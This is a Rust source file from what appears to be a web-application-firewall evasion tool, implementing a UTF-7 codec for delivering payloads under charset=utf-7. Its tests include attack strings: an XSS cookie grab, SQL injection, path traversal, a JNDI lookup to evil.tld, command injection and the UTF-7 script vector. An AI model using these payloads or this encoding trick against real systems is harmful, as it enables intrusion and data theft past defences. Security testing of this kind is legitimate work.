wafrift_types/
utf7.rs

1//! UTF-7 (RFC 2152) codec — a foundational, self-contained primitive.
2//!
3//! Lives here in `wafrift-types` (alongside [`crate::hash`]) rather than in
4//! `wafrift-encoding` so BOTH `wafrift-encoding` (as an encoding strategy)
5//! and `wafrift-grammar` (for the `charset=utf-7` delivery shape) can reuse
6//! ONE source of truth without `grammar` having to depend on the heavy
7//! `encoding` crate (which pulls native `brotli`/`flate2`). `encoding`
8//! re-exports `utf7_encode`/`utf7_decode` for backward compatibility.
9//!
10//! The round-trip identity `utf7_decode(utf7_encode(s)) == Some(s)` is the
11//! soundness basis for delivering a payload under `charset=utf-7`: a
12//! UTF-7-honoring backend recovers the exact bytes the operator supplied.
13
14use base64::{Engine as _, engine::general_purpose};
15
/// Serialise one Unicode scalar value as big-endian UTF-16 bytes.
///
/// A character that fits in a single UTF-16 code unit yields two bytes; one
/// that needs a surrogate pair yields four (high surrogate first).
fn char_to_utf16be(c: char) -> Vec<u8> {
    let mut units = [0u16; 2];
    let bytes: Vec<u8> = c
        .encode_utf16(&mut units)
        .iter()
        // Most-significant byte first for every code unit.
        .flat_map(|unit| unit.to_be_bytes())
        .collect();
    bytes
}
27
28/// Modified Base64 for UTF-7 (RFC 2152) — standard alphabet without padding.
29fn modified_base64(bytes: &[u8]) -> String {
30    let mut b64 = general_purpose::STANDARD.encode(bytes);
31    b64.retain(|c| c != '=');
32    b64
33}
34
/// Reports whether `ch` is an RFC 2152 direct character: an ASCII letter, an
/// ASCII digit, or one of the punctuation marks `' ( ) , - . / : ?`.
///
/// Everything else — including `+`, whitespace and all non-ASCII text — is
/// not direct.
fn is_utf7_direct(ch: char) -> bool {
    // The nine punctuation characters accepted alongside letters and digits.
    const DIRECT_PUNCTUATION: &str = "'(),-./:?";
    ch.is_ascii_alphanumeric() || DIRECT_PUNCTUATION.contains(ch)
}
53
54/// UTF-7 encoding per RFC 2152.
55///
56/// **Context**: `iis`, `legacy-dotnet` — only safe where the target actually
57/// decodes UTF-7.
58#[must_use]
59pub fn utf7_encode(payload: &str) -> String {
60    let mut out = String::new();
61    let mut shift_buf: Vec<u8> = Vec::new();
62
63    fn flush_shift(out: &mut String, buf: &mut Vec<u8>) {
64        if !buf.is_empty() {
65            out.push('+');
66            out.push_str(&modified_base64(buf));
67            out.push('-');
68            buf.clear();
69        }
70    }
71
72    for ch in payload.chars() {
73        if ch == '+' {
74            flush_shift(&mut out, &mut shift_buf);
75            out.push_str("+-");
76        } else if is_utf7_direct(ch) {
77            flush_shift(&mut out, &mut shift_buf);
78            out.push(ch);
79        } else {
80            shift_buf.extend_from_slice(&char_to_utf16be(ch));
81        }
82    }
83    flush_shift(&mut out, &mut shift_buf);
84    out
85}
86
/// Reports whether `b` belongs to the modified-Base64 alphabet of RFC 2152,
/// i.e. the standard `A-Za-z0-9+/` set with no padding character.
///
/// `-` is deliberately outside the set, which is what lets it terminate a
/// shift sequence unambiguously.
fn is_modified_base64_byte(b: u8) -> bool {
    matches!(b, b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'+' | b'/')
}
93
/// Length in bytes of the UTF-8 sequence introduced by `first`, used to copy
/// direct (non-shifted) text through the UTF-7 decoder one scalar at a time.
///
/// The count of leading one-bits selects the length: none means a 1-byte
/// ASCII character, two a 2-byte sequence, three a 3-byte sequence. Every
/// other byte value — continuation bytes included — is reported as 4.
fn utf8_lead_len(first: u8) -> usize {
    match first.leading_ones() {
        0 => 1,
        2 => 2,
        3 => 3,
        _ => 4,
    }
}
104
105/// Decode UTF-7 (RFC 2152) — the inverse of [`utf7_encode`], i.e. exactly
106/// what a UTF-7-honoring backend computes. `+` opens a shift sequence of
107/// modified-Base64 carrying UTF-16BE code units, terminated by `-` (absorbed)
108/// or any non-Base64 byte (kept); `+-` is a literal `+`; every other byte
109/// passes through. Returns `None` on malformed Base64, an odd UTF-16 byte
110/// count, or unpaired surrogates — so a caller proving round-trip soundness
111/// treats undecodable input as "not recoverable" rather than guess.
112#[must_use]
113pub fn utf7_decode(s: &str) -> Option<String> {
114    let b = s.as_bytes();
115    let mut out = String::new();
116    let mut i = 0;
117    while i < b.len() {
118        if b[i] == b'+' {
119            // `+-` → literal `+`.
120            if i + 1 < b.len() && b[i + 1] == b'-' {
121                out.push('+');
122                i += 2;
123                continue;
124            }
125            // Gather the modified-Base64 run.
126            let start = i + 1;
127            let mut j = start;
128            while j < b.len() && is_modified_base64_byte(b[j]) {
129                j += 1;
130            }
131            let mut chunk = s[start..j].to_string();
132            while !chunk.len().is_multiple_of(4) {
133                chunk.push('='); // re-pad for the standard decoder
134            }
135            let raw = general_purpose::STANDARD.decode(chunk.as_bytes()).ok()?;
136            if raw.len() % 2 != 0 {
137                return None; // UTF-16BE is 2 bytes per code unit
138            }
139            let units: Vec<u16> = raw
140                .chunks_exact(2)
141                .map(|c| (u16::from(c[0]) << 8) | u16::from(c[1]))
142                .collect();
143            out.push_str(&String::from_utf16(&units).ok()?);
144            i = j;
145            if i < b.len() && b[i] == b'-' {
146                i += 1; // absorb the explicit terminator
147            }
148        } else {
149            let len = utf8_lead_len(b[i]);
150            if i + len > b.len() {
151                return None;
152            }
153            out.push_str(s.get(i..i + len)?);
154            i += len;
155        }
156    }
157    Some(out)
158}
159
#[cfg(test)]
mod tests {
    use super::{utf7_decode, utf7_encode};

    /// Payloads that must survive an encode → decode round trip unchanged.
    const CORPUS: &[&str] = &[
        "<script>alert(document.cookie)</script>",
        "' OR '1'='1' -- ",
        "1 UNION SELECT password FROM users",
        "../../../../etc/passwd",
        "${jndi:ldap://evil.tld/a}",
        "; cat /etc/passwd",
        "plain ascii",
        "+already+plus+",
        "café ☕ 日本語 😀 surrogate-pair",
        "",
        "=",
        "<>\"'&;|()[]{}",
    ];

    #[test]
    fn utf7_basic_encode() {
        // Direct characters pass through untouched.
        let passthrough = utf7_encode("Hello");
        assert_eq!(passthrough, "Hello");

        // A literal `+` is escaped as `+-`.
        let escaped_plus = utf7_encode("A+B");
        assert_eq!(escaped_plus, "A+-B");

        // Non-ASCII text opens a shift sequence.
        let shifted = utf7_encode("日本語");
        assert!(shifted.starts_with('+'));
    }

    #[test]
    fn utf7_decode_matches_canonical_vectors() {
        // (wire form, decoded text): the well-known UTF-7 XSS vector, the
        // literal-plus escape, and plain direct text.
        let vectors = [
            ("+ADw-script+AD4-", "<script>"),
            ("+-", "+"),
            ("hello", "hello"),
        ];
        for (wire, plain) in vectors {
            assert_eq!(utf7_decode(wire).as_deref(), Some(plain));
        }

        // And the encoder produces exactly that canonical vector.
        assert_eq!(utf7_encode("<script>"), "+ADw-script+AD4-");
    }

    #[test]
    fn utf7_round_trips_attack_corpus_and_unicode() {
        // SOUNDNESS basis for a charset=utf-7 delivery: decoding the encoded
        // form must give back the EXACT operator payload for every member.
        for p in CORPUS.iter().copied() {
            let enc = utf7_encode(p);
            let recovered = utf7_decode(&enc);
            assert_eq!(
                recovered.as_deref(),
                Some(p),
                "UTF-7 round-trip lost bytes for {p:?} via {enc}"
            );
        }
    }
}
wafrift_types/utf7.rs

wafrift_types/
utf7.rs